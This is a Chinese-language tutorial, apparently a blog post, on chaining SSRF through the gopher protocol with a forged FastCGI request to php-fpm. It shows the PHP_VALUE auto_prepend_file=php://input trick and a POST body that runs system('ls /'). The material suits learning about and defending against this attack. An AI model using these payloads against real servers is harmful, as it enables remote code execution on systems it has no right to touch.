SSRF_FastCGI

FastCGI协议

  • 简介

    • Fast CGI源自旧版本的CGI

      • 路由/结构图

        • # 访问url --> 浏览器生成HTTP请求报文 --> web server解析请求(例如nginx)
          web server 是内容的分发者
          当访问静态页面时,web server 会直接返回资源,例如index.html
          当访问动态页面时,web server 会调用解析器,例如index.php
          # --> 访问CGI
          # --> CGI初始化环境,加载配置,处理请求,返回资源,结束进程 (每次处理请求后都会销毁进程,浪费资源)
      • 旧版本的CGI性能低下,无法应用在高并发的场景,FastCGI应运而生

    • FastCGI也是一种通信协议(类似HTTP协议),采用CS架构,web server 为客户端---发送请求,动态语言解析器 为服务端---处理请求

      • 路由/结构图

        • # 访问url --> 浏览器生成HTTP请求报文 --> web server解析请求(例如nginx)
          当访问index.php时,web server 会把HTTP请求转换为FastCGI请求
          # --> 转换为FastCGI协议格式
          并发送给解析器,这里以php为例
          # --> 发送至php-fpm process manager
          php-fpm接收到请求后,把请求分配给一个worker,worker就是一个解析服务的进程(一直运行),worker根据请求信息,解析php,返回页面
          例如,招新平台运行了15个worker,(不考虑nginx处理时间)同时可以处理15个请求
          # --> php-fpm解析并响应
        • 对比图

  • FastCGI报文格式

    • 定义

      typedef struct {
      unsigned char version; //版本
      unsigned char type; //类型
      unsigned char requestIdB1; //请求Id
      unsigned char requestIdB0;
      unsigned char contentLengthB1; //负载长度
      unsigned char contentLengthB0;
      unsigned char paddingLength; //填充长度
      unsigned char reserved; //保留字节
      unsigned char contentData[contentLength]; //负载数据
      unsigned char paddingData[paddingLength]; //填充数据
      } FCGI_Record;
    • 构造出的执行ls /命令的FastCGI请求( 调整过格式,不标准)

      CONTENT_LENGTH 34 # 内容长度
      CONTENT_TYPE application/text # 内容格式
      REMOTE_PORT 9985 # 请求端口
      SERVER_NAME localhost # server名
      GATEWAY_INTERFACE FastCGI/1.0 # API
      SERVER_SOFTWARE php/fcgiclient # server端 软件
      REMOTE_ADDR 127.0.0.1 # 请求ip
      SCRIPT_FILENAME /var/www/html/index.php # 脚本文件名
      SCRIPT_NAME /var/www/html/index.php # 脚本名
      PHP_VALUE auto_prepend_file = php://input
      REQUEST_METHOD POST # 请求方法
      SERVER_PORT 8 # server端口
      SERVER_PROTOCOL HTTP/1.1 # server 协议
      QUERYDOCUMENT_ROOT / # 请求文件根目录
      IN_VALUE allow_url_include = On # 设置 允许url包含
      SERVER_ADDR 127.0.0.1 # server ip
      REQUEST_URI /var/www/html/index.php # 请求资源 "<?php var_dump(system('ls /')); ?>" # 内容

SSRF

  • 简介

    • SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造的,由服务端发起请求的漏洞。
    • 利用不安全的配置,构造可以访问内网的请求
      • 例如:

        • /secret.php 是外网无法访问的
        • http://xxx.xxx/?url=http://127.0.0.1/example.php,该链接会使用curl构造请求,访问/var/www/html/secret.php文件,如果配置不当,就可以利用GET参数url,构造请求访问内网资源
        • 假如内网的3000端口有管理系统,则可以通过?url=http://127.0.0.1:3000进行访问
  • ssrf万金油----gopher

    • gopher是被http替代掉的老协议

    • 协议格式

      • gopher://IP:PORT/_+TCP/IP数据

      • 例如

        • http请求:http://127.0.0.1/index.php?test=123

          • http请求包

          • GET /index.php?test=123 HTTP/1.1
            Host: 127.0.0.1
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-CN,zh;q=0.9
            Connection: close
        • gopher请求:gopher://127.0.0.1:80/_GET%20index.php?test=123%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%0d%0a%55%70%67%72%61%64%65%2d%49%6e%73%65%63%75%72%65%2d%52%65%71%75%65%73%74%73%3a%20%31%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%4d%6f%7a%69%6c%6c%61%2f%35%2e%30%20%28%57%69%6e%64%6f%77%73%20%4e%54%20%31%30%2e%30%3b%20%57%69%6e%36%34%3b%20%78%36%34%29%20%41%70%70%6c%65%57%65%62%4b%69%74%2f%35%33%37%2e%33%36%20%28%4b%48%54%4d%4c%2c%20%6c%69%6b%65%20%47%65%63%6b%6f%29%20%43%68%72%6f%6d%65%2f%37%34%2e%30%2e%33%37%32%39%2e%31%36%39%20%53%61%66%61%72%69%2f%35%33%37%2e%33%36%0d%0a%41%63%63%65%70%74%3a%20%74%65%78%74%2f%68%74%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%68%74%6d%6c%2b%78%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%6d%6c%3b%71%3d%30%2e%39%2c%69%6d%61%67%65%2f%77%65%62%70%2c%69%6d%61%67%65%2f%61%70%6e%67%2c%2a%2f%2a%3b%71%3d%30%2e%38%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%69%67%6e%65%64%2d%65%78%63%68%61%6e%67%65%3b%76%3d%62%33%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%2d%4c%61%6e%67%75%61%67%65%3a%20%7a%68%2d%43%4e%2c%7a%68%3b%71%3d%30%2e%39%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%0d%0a%0d%0a

          • 这是HTTP请求包的url编码
          • gopher会访问指定IP(上面是127.0.0.1)的指定端口(上面是80,http默认端口),并传递_之后的数据
        • 也就是说,如果能使用gopher协议,那么只需要构造我们要用到的协议的请求数据(比如上面的HTTP),就可以实现访问

ssrf + fastcgi

  • 如果目标服务器使用的是php,并且存在ssrf,那么就可以构造FastCGI请求报文,直接让php解析服务进行解析,进而执行任意代码
  • 之前构造出的执行 ls /的FastCGI请求中,关键部分
PHP_VALUE auto_prepend_file = php://input
# 把auto_prepende_file的内容设置为 php://input http post body
# auto_prepende_file 会在解析指定php文件之前包含(可以理解为执行)
# php://input的内容为POST请求的body IN_VALUE allow_url_include = On # 设置 允许url包含 使php://input被允许执行 REQUEST_URI /var/www/html/index.php # 请求资源 "<?php var_dump(system('ls /')); ?>" # 内容 post body
  • 会在解析index.php之前,包含(执行)php://input的内容<?php var_dump(system('ls /')); ?>

  • 这样,就可以使用ssrf+fastcgi执行任意代码了

    示例

参考

SSRF_FastCGI的更多相关文章

随机推荐

  1. mysql创建读写账号及服务相关优化配置

    grant select on xoms_prod.* to 'kzcf'@'%' identified by '123456'; 赋权多权限就   grant select,update,delet ...

  2. python基础学习之类的继承、魔法方法

    什么是继承 即类A可以使用类B的方法,即B是A的父类,A是B的子类,AB之间是继承关系 class Father():  # 父类 def __init__(self,name,age): self. ...

  3. 2019 GDUT Rating Contest I : Problem B. Teamwork

    题面: 传送门 B. Teamwork Input file: standard input Output file: standard output Time limit: 1 second Memor ...

  4. javascript中的Strict模式

    目录 简介 使用Strict mode strict mode的新特性 强制抛出异常 简化变量的使用 简化arguments 让javascript变得更加安全 保留关键字和function的位置 总 ...

  5. Linux wget 使用笔记

    wget 是 Linux 上最常用的文件下载工具,简单实用.记录一下一些常用的操作备查. 最常用最简单的操作就是直接使用一个 URL 下载 下载互联网上指定的文件 wget https://gemme ...

  6. 使用 DD 命令制作 USB 启动盘

    Windows 下有很多很好用的 USB 启动盘制作工具,比如 Rufus,但是 MacOS 下这个类型的工具就少了很多,这里记录下在 MacOS 中用 DD 命令制作 Linux USB 启动盘的操 ...

  7. 攻防世界 reverse serial-150

    serial-150 suctf-2016 直接使用ida发现main函数中夹杂大片数据,应该是自修改代码,动态调试: 调试中发现,输入为16位,验证方法为:从头开始取一字符进行比较,比较通过检验后, ...

  8. 使用C# (.NET Core) 实现装饰模式 (Decorator Pattern) 并介绍 .NET/Core的Stream

    该文章综合了几本书的内容. 某咖啡店项目的解决方案 某咖啡店供应咖啡, 客户买咖啡的时候可以添加若干调味料, 最后要求算出总价钱. Beverage是所有咖啡饮料的抽象类, 里面的cost方法是抽象的 ...

  9. 2021华为软件精英挑战赛(C/C++实现)-苦行僧的实现过程

    下面给出2021华为软件精英挑战赛参与的整个过程,虽然成绩不是很好,但是也是花了一些时间的,希望后面多多学习,多多进步. 代码已经上传到了Github上:https://github.com/myFr ...

  10. 微信小程序 | flex布局属性

    flex-direction 主轴方向 row: 横向 row-reverse: 横向倒序 column: 纵向 column-reverse: 纵向倒序; flex-wrap 元素排列换行 nowr ...